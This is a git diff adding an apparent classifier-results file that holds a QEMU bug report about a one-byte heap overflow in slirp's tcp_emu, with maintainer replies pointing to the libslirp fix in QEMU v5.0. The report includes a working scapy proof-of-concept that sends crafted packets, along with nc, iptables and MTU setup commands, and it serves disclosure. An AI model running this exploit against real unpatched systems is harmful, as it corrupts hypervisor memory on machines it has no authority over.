summary refs log tree commit diff stats
path: root/results/classifier/108/other/1858415
diff options
context:
space:
mode:
Diffstat (limited to 'results/classifier/108/other/1858415')
-rw-r--r--results/classifier/108/other/1858415110
1 files changed, 110 insertions, 0 deletions
diff --git a/results/classifier/108/other/1858415 b/results/classifier/108/other/1858415
new file mode 100644
index 000000000..4b246fae7
--- /dev/null
+++ b/results/classifier/108/other/1858415
@@ -0,0 +1,110 @@
+other: 0.735
+network: 0.686
+debug: 0.665
+device: 0.654
+socket: 0.653
+graphic: 0.650
+permissions: 0.625
+performance: 0.623
+files: 0.619
+PID: 0.607
+semantic: 0.596
+boot: 0.592
+vnc: 0.580
+KVM: 0.523
+
+in tcp_emu function has OOB bug
+
+qemu version: 4.1.0 
+
+```c
+int tcp_emu(struct socket *so, struct mbuf *m){
+............
+case EMU_REALAUDIO:
+............
+    while (bptr < m->m_data + m->m_len) {
+        case 6:
+............
+            lport = (((uint8_t *)bptr)[0] << 8) + ((uint8_t *)bptr)[1];
+............               
+            *(uint8_t *)bptr++ = (p >> 8) & 0xff;
+            *(uint8_t *)bptr = p & 0xff;
+............
+    }
+............
+............
+}
+```
+
+bptr)[1] and  bptr++ ,may make bptr ==  m->m_data + m->m_len,and cause OOB(out of bounds.)
+
+Thanks for your bug report. For future security critical bugs, please follow the steps described on https://wiki.qemu.org/SecurityProcess instead.
+For this one, I've forwarded the information to the libslirp project, since the "slirp" code has been moved to a separate project which is no longer part of the QEMU project. They've included a fix here:
+https://gitlab.freedesktop.org/slirp/libslirp/commit/2655fffed7a9e765bcb4701dd876e9dab975f289
+
+Thanks
+
+poc:
+```python
+#!/usr/bin/python3
+
+import os
+import time
+from scapy.all import *
+
+target_ip = '10.0.2.2'
+target_port = 7070
+
+def start_tcp(target_ip,target_port,str_to_send):
+    global sport,s_seq,d_seq
+    try:
+        ans = sr1(IP(dst=target_ip)/TCP(dport=target_port,sport=RandShort(),seq=RandInt(),flags=0x2),verbose=False)
+        sport = ans[TCP].dport
+        s_seq = ans[TCP].ack
+        d_seq = ans[TCP].seq+1
+        
+        send(IP(dst=target_ip)/TCP(dport=target_port,sport=sport,ack=d_seq,seq=s_seq,flags=0x10),verbose=False)
+
+        send(IP(dst=target_ip)/TCP(dport=target_port,sport=sport,ack=d_seq,seq=s_seq,flags=0x18)/str_to_send,verbose=False)
+        print(ans[TCP])
+    except Exception as e:
+        print(e)
+
+if __name__ == '__main__':
+    buf = ['R' for n in range(2200)];
+    buf_len = len(buf);
+    
+    buf[buf_len-10]= chr(0x50)
+    buf[buf_len-9] = chr(0x4e)
+    buf[buf_len-8] = chr(0x41)
+    buf[buf_len-7] = chr(0x00)
+    buf[buf_len-1] = chr(27)
+    start_tcp(target_ip,target_port,"".join(buf))
+```
+
+In host OS run:
+
+```shell
+nc -l -p 7070 
+```
+
+In guest OS run:
+
+```shell
+# iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 10.0.2.2 -j DROP # Because we will use Python to construct tcp packets, this will prevent the kernel from sending rst packets.
+# ip link set ens3 mtu 3000 # When the sending size is larger than the default mtu packet, the slipr_input function allocates space from the heap, and then we can overflow one byte of the heap space
+# ./poc
+```
+
+This will cause a byte heap overflow.
+
+Excuse me, can I get a CVE number?
+
+If you need a CVE number, please send a mail with the bug description to the people listed on https://wiki.qemu.org/SecurityProcess
+
+thank you very much!
+
+This should be fixed with QEMU v5.0.
+
+libslirp fix included in commit 7769c23774d1, released in QEMU-v5.0.0
+